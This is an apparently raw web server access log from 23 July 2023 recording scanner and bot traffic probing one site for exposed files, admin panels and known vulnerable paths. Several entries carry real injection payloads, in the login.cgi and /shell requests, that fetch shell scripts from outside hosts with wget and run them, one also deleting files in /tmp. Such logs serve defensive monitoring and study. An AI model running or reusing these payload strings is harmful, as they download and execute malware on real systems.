147.182.149.29 - - [23/Jul/2023:02:05:09 +0200] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 162.243.149.19 - - [23/Jul/2023:02:14:08 +0200] "GET /druid/index.html HTTP/1.1" 404 287 "-" "Mozilla/5.0 zgrab/0.x" 198.235.24.37 - - [23/Jul/2023:02:43:27 +0200] "\x16\x03\x01" 400 383 "-" "-" 210.16.189.19 - - [23/Jul/2023:03:15:50 +0200] "GET /wp-login.php HTTP/1.1" 404 299 "-" "Apache-HttpClient/4.5.2 (Java/1.8.0_361)" 45.133.172.13 - - [23/Jul/2023:04:07:24 +0200] "GET /~ridersde/joomla/index.php?option=com_xijc&view=captcha HTTP/1.0" 404 309 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:68.0) Gecko/20100101 Firefox/68.0" 218.145.61.20 - - [23/Jul/2023:04:08:40 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://114.67.217.170/sora.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0" 64.227.188.49 - - [23/Jul/2023:04:23:42 +0200] "GET /bundle.js HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 64.227.188.49 - - [23/Jul/2023:04:23:42 +0200] "GET /files/ HTTP/1.1" 404 281 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 98.159.234.163 - - [23/Jul/2023:04:29:21 +0200] "GET /~ridersde/joomla/index.php?option=com_xijc&view=captcha HTTP/1.0" 404 309 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:93.0) Gecko/20100101 Firefox/93.0" 195.28.75.190 - - [23/Jul/2023:05:24:27 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 20.64.229.7 - - [23/Jul/2023:05:27:14 +0200] "GET /.env HTTP/1.1" 404 280 "-" "python-requests/2.31.0" 45.79.172.21 - - [23/Jul/2023:06:00:02 +0200] "\x16\x03\x01" 400 383 "-" "-" 152.32.133.238 - - [23/Jul/2023:06:40:02 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 94.102.61.10 - - [23/Jul/2023:07:13:05 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" 111.61.212.163 - - [23/Jul/2023:07:23:50 +0200] "POST /HNAP1/ HTTP/1.0" 400 373 "-" "-" 64.62.197.167 - - [23/Jul/2023:07:43:38 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0" 64.62.197.171 - - [23/Jul/2023:07:45:17 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; rv:110.0) Gecko/20100101 Firefox/110.0" 64.62.197.167 - - [23/Jul/2023:07:45:44 +0200] "GET /geoserver/web/ HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0" 222.186.48.204 - - [23/Jul/2023:08:02:46 +0200] "GET / HTTP/1.1" 200 274 "-" "Go-http-client/1.1" 213.109.202.66 - - [23/Jul/2023:08:09:26 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 185.93.110.155 - - [23/Jul/2023:08:16:39 +0200] "GET /wp-cc.php HTTP/1.1" 404 365 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0" 185.93.110.155 - - [23/Jul/2023:08:16:39 +0200] "GET /wp-commentin.php HTTP/1.1" 404 372 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 195.181.38.132 - - [23/Jul/2023:08:19:30 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" 195.181.38.132 - - [23/Jul/2023:08:19:30 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 103.95.121.242 - - [23/Jul/2023:08:20:33 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 94.182.0.158 - - [23/Jul/2023:08:20:55 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 213.109.202.66 - - [23/Jul/2023:08:27:28 +0200] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 306 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 213.87.162.29 - - [23/Jul/2023:08:27:58 +0200] "GET /%7Eridersde/joomla/index.php?option=com_Kunena HTTP/1.0" 404 386 "http://coffeenostra.castlegem.co.uk/%7Eridersde/joomla/index.php?option=com_Kunena" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36" 213.87.162.29 - - [23/Jul/2023:08:27:58 +0200] "GET / HTTP/1.0" 200 423 "http://coffeenostra.castlegem.co.uk/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36" 218.145.61.20 - - [23/Jul/2023:08:47:03 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://114.67.217.170/sora.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0" 213.109.202.66 - - [23/Jul/2023:09:08:27 +0200] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 306 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 184.105.247.194 - - [23/Jul/2023:09:49:25 +0200] "\x16\x03\x01" 400 383 "-" "-" 205.210.31.32 - - [23/Jul/2023:09:49:44 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 198.199.115.21 - - [23/Jul/2023:09:49:56 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x" 167.99.206.91 - - [23/Jul/2023:09:51:34 +0200] "\x16\x03\x01\x01\xfc\x01" 400 383 "-" "-" 176.125.230.32 - - [23/Jul/2023:09:57:30 +0200] "GET /~ridersde/joomla/index.php?option=com_xijc&view=captcha HTTP/1.0" 404 309 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:61.0) Gecko/20100101 Firefox/61.0" 213.109.202.66 - - [23/Jul/2023:10:04:27 +0200] "GET /solr/admin/info/system?wt=json HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 188.166.78.190 - - [23/Jul/2023:10:05:49 +0200] "\x16\x03\x01" 400 383 "-" "-" 188.166.78.190 - - [23/Jul/2023:10:05:49 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 188.166.78.190 - - [23/Jul/2023:10:05:49 +0200] "\x16\x03\x01" 400 383 "-" "-" 213.109.202.66 - - [23/Jul/2023:10:49:24 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 218.145.61.20 - - [23/Jul/2023:10:51:00 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://114.67.217.170/sora.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0" 128.90.141.25 - - [23/Jul/2023:11:03:24 +0200] "HEAD /wordpress HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 128.90.141.25 - - [23/Jul/2023:11:03:24 +0200] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 128.90.141.25 - - [23/Jul/2023:11:03:25 +0200] "HEAD /wp HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 128.90.141.25 - - [23/Jul/2023:11:03:25 +0200] "HEAD /bc HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 128.90.141.25 - - [23/Jul/2023:11:03:26 +0200] "HEAD /bk HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 128.90.141.25 - - [23/Jul/2023:11:03:26 +0200] "HEAD /backup HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 128.90.141.25 - - [23/Jul/2023:11:03:26 +0200] "HEAD /old HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 128.90.141.25 - - [23/Jul/2023:11:03:27 +0200] "HEAD /new HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 128.90.141.25 - - [23/Jul/2023:11:03:27 +0200] "HEAD /main HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 128.90.141.25 - - [23/Jul/2023:11:03:27 +0200] "HEAD /home HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 213.109.202.66 - - [23/Jul/2023:11:13:30 +0200] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 176.109.229.186 - - [23/Jul/2023:11:15:50 +0200] "GET /wp-content/uploads.php HTTP/1.1" 404 371 "-" "-" 122.149.26.87 - - [23/Jul/2023:11:31:07 +0200] "GET /triadian/squid.jpg HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Linux; Android 5.0; SM-G900P Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.3491.1198 Mobile Safari/537.36" 54.251.216.163 - - [23/Jul/2023:11:31:14 +0200] "GET /robots.txt HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)" 194.46.248.153 - - [23/Jul/2023:11:35:15 +0200] "GET /robots.txt HTTP/1.1" 404 292 "-" "Mozilla/5.0 (Linux; Android 8.0; Pixel 2 Build/OPD3.170816.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.3556.1597 Mobile Safari/537.36" 52.167.144.55 - - [23/Jul/2023:11:45:40 +0200] "GET /robots.txt HTTP/1.1" 404 288 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36" 213.109.202.66 - - [23/Jul/2023:11:45:44 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 207.46.13.211 - - [23/Jul/2023:11:45:47 +0200] "GET /sitemap_index.xml HTTP/1.1" 404 293 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36" 35.203.210.169 - - [23/Jul/2023:12:00:48 +0200] "GET / HTTP/1.1" 200 423 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com" 91.204.250.52 - - [23/Jul/2023:12:15:16 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" 109.237.98.226 - - [23/Jul/2023:12:28:30 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 109.237.98.226 - - [23/Jul/2023:12:28:30 +0200] "\x16\x03\x01\x01H\x01" 400 383 "-" "-" 213.109.202.66 - - [23/Jul/2023:12:48:41 +0200] "GET /console/ HTTP/1.1" 404 282 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 207.46.13.211 - - [23/Jul/2023:13:10:45 +0200] "GET /sitemap_index.xml HTTP/1.1" 404 293 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36" 213.109.202.66 - - [23/Jul/2023:13:24:29 +0200] "GET /_ignition/execute-solution HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 167.94.146.60 - - [23/Jul/2023:13:53:46 +0200] "GET / HTTP/1.1" 200 423 "-" "-" 167.94.146.60 - - [23/Jul/2023:13:53:46 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 167.94.146.60 - - [23/Jul/2023:13:53:46 +0200] "PRI * HTTP/2.0" 400 383 "-" "-" 167.94.146.60 - - [23/Jul/2023:13:53:46 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 167.94.146.60 - - [23/Jul/2023:13:53:46 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" 213.109.202.66 - - [23/Jul/2023:14:12:44 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 94.232.42.99 - - [23/Jul/2023:14:15:47 +0200] "\x03" 400 383 "-" "-" 94.232.42.99 - - [23/Jul/2023:14:15:47 +0200] "\x03" 400 383 "-" "-" 94.232.42.99 - - [23/Jul/2023:14:15:47 +0200] "\x03" 400 383 "-" "-" 31.220.3.140 - - [23/Jul/2023:14:57:22 +0200] "GET /config/getuser?index=0 HTTP/1.1" 404 287 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" 213.109.202.66 - - [23/Jul/2023:15:06:48 +0200] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 290 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 92.118.39.40 - - [23/Jul/2023:15:15:53 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" 35.217.26.113 - - [23/Jul/2023:15:19:22 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; a7d576d2ab) Chrome/84.0.4147.105 Safari/537.36" 35.217.26.113 - - [23/Jul/2023:15:19:22 +0200] "GET /robots.txt HTTP/1.1" 404 295 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; a7d576d2ab) Chrome/84.0.4147.105 Safari/537.36" 35.217.26.113 - - [23/Jul/2023:15:19:25 +0200] "GET /ads.txt HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; a7d576d2ab) Chrome/84.0.4147.105 Safari/537.36" 35.217.26.113 - - [23/Jul/2023:15:19:25 +0200] "GET /app-ads.txt HTTP/1.1" 404 296 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko; compatible; BW/1.1; bit.ly/3eZNDnO; a7d576d2ab) Chrome/84.0.4147.105 Safari/537.36" 193.42.32.170 - - [23/Jul/2023:15:26:14 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 193.42.32.170 - - [23/Jul/2023:15:26:14 +0200] "POST / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30" 64.226.125.192 - - [23/Jul/2023:15:47:42 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 64.226.125.192 - - [23/Jul/2023:15:47:42 +0200] "GET /1.php HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 64.226.125.192 - - [23/Jul/2023:15:47:42 +0200] "GET /bundle.js HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 64.226.125.192 - - [23/Jul/2023:15:47:42 +0200] "GET /files/ HTTP/1.1" 404 281 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" 213.109.202.66 - - [23/Jul/2023:16:23:37 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 41.232.218.49 - - [23/Jul/2023:16:46:22 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.8.251.176/jaws;sh+/tmp/jaws" 400 383 "-" "-" 207.154.238.116 - - [23/Jul/2023:16:46:56 +0200] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 213.109.202.66 - - [23/Jul/2023:17:04:07 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 45.79.124.188 - - [23/Jul/2023:17:12:01 +0200] "GET / HTTP/1.0" 200 423 "-" "-" 96.126.104.221 - - [23/Jul/2023:17:12:09 +0200] "GET / HTTP/1.0" 200 423 "-" "-" 96.126.104.221 - - [23/Jul/2023:17:12:11 +0200] "Gh0st\xad" 400 383 "-" "-" 96.126.104.221 - - [23/Jul/2023:17:12:14 +0200] "HELP" 400 383 "-" "-" 96.126.104.221 - - [23/Jul/2023:17:12:14 +0200] "\x1b\x84\xd5\xb0]\xf4\xc4\x93\xc50\xc2X\x8c\xda\xb1\xd7\xac\xafn\x1d\xe1\x1e\x1a3*\x85\xb7\x1d'\xb1\xc9k\xbf\xf0\xbc" 400 383 "-" "-" 96.126.104.221 - - [23/Jul/2023:17:12:16 +0200] "\x16\x03\x01" 400 383 "-" "-" 96.126.104.221 - - [23/Jul/2023:17:12:18 +0200] "\xbd\xff\x9e\xffE\xff\x9e\xff\xbd\xff\x9e\xff\xa4\xff\x86\xff\xc4\xff\xbe\xff\xc7\xff\xdb\xff\xee\xffx\\d9\xff\xed\xff\xa4\xff\x9d\xff\xcf\xff\xd8\xff\xe5\xff\x04\xff\x12\xff0\xff\xb1\xff\xbd\xff\xe7\xff\xe2\xff\xdd\xff\xdc\xff\xde\xff\xc8\xff\xcc\xff\xbe\xff\xf8\xff&\xff\x01\xff\x0f\xff\xf5\xff\x06\xff\xff\xff\xf7\xff!\xff\xde\xff\x02\xff&\xff\x0c\xff\x01\xff\xf5\xff" 400 383 "-" "-" 213.109.202.66 - - [23/Jul/2023:17:23:12 +0200] "GET /geoserver HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 91.244.172.84 - - [23/Jul/2023:17:40:30 +0200] "GET /wp-content/plugins/essential-addons-for-elementor-lite/assets/admin/css/cloud.css HTTP/1.1" 404 433 "-" "Mozilla/5.0 (Linux; Android 7.0; Moto G (4)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4143.7 Mobile Safari/537.36 Chrome-Lighthouse" 156.212.26.177 - - [23/Jul/2023:17:50:16 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.8.251.176/jaws;sh+/tmp/jaws" 400 383 "-" "-" 181.41.206.27 - - [23/Jul/2023:17:51:00 +0200] "GET /~ridersde/joomla/index.php?option=com_xijc&view=captcha HTTP/1.0" 404 309 "https://www.google.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:67.0) Gecko/20100101 Firefox/67.0" 197.49.244.131 - - [23/Jul/2023:18:00:22 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+ 212.8.251.176/jaws;sh+/tmp/jaws" 400 383 "-" "-" 80.66.88.211 - - [23/Jul/2023:18:02:42 +0200] "\x03" 400 383 "-" "-" 207.46.13.211 - - [23/Jul/2023:18:08:05 +0200] "GET /sitemap_index.xml HTTP/1.1" 404 293 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36" 183.136.225.48 - - [23/Jul/2023:18:51:48 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" 183.136.225.48 - - [23/Jul/2023:18:52:40 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" 183.136.225.48 - - [23/Jul/2023:18:52:48 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" 183.136.225.48 - - [23/Jul/2023:18:52:50 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 QIHU 360SE" 123.113.110.3 - - [23/Jul/2023:18:58:31 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+37.44.238.203/jaws;sh+/tmp/jaws HTTP/1.1" 404 346 "-" "Hello, world" 128.90.141.25 - - [23/Jul/2023:19:17:21 +0200] "HEAD /wordpress HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 128.90.141.25 - - [23/Jul/2023:19:17:21 +0200] "HEAD / HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 128.90.141.25 - - [23/Jul/2023:19:17:21 +0200] "HEAD /wp HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 128.90.141.25 - - [23/Jul/2023:19:17:22 +0200] "HEAD /bc HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 128.90.141.25 - - [23/Jul/2023:19:17:22 +0200] "HEAD /bk HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 128.90.141.25 - - [23/Jul/2023:19:17:22 +0200] "HEAD /backup HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 128.90.141.25 - - [23/Jul/2023:19:17:22 +0200] "HEAD /old HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 128.90.141.25 - - [23/Jul/2023:19:17:23 +0200] "HEAD /new HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 128.90.141.25 - - [23/Jul/2023:19:17:23 +0200] "HEAD /main HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 128.90.141.25 - - [23/Jul/2023:19:17:23 +0200] "HEAD /home HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 207.46.13.211 - - [23/Jul/2023:19:18:02 +0200] "GET /sitemap_index.xml HTTP/1.1" 404 293 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/103.0.5060.134 Safari/537.36" 167.71.199.32 - - [23/Jul/2023:19:30:22 +0200] "GET / HTTP/1.1" 200 274 "-" "Linux Gnu (cow)" 185.180.143.11 - - [23/Jul/2023:19:34:50 +0200] "GET /favicon.ico HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" 84.54.51.12 - - [23/Jul/2023:19:36:38 +0200] "CONNECT google.com:443 HTTP/1.1" 200 423 "-" "Go-http-client/1.1" 223.130.28.72 - - [23/Jul/2023:19:42:11 +0200] 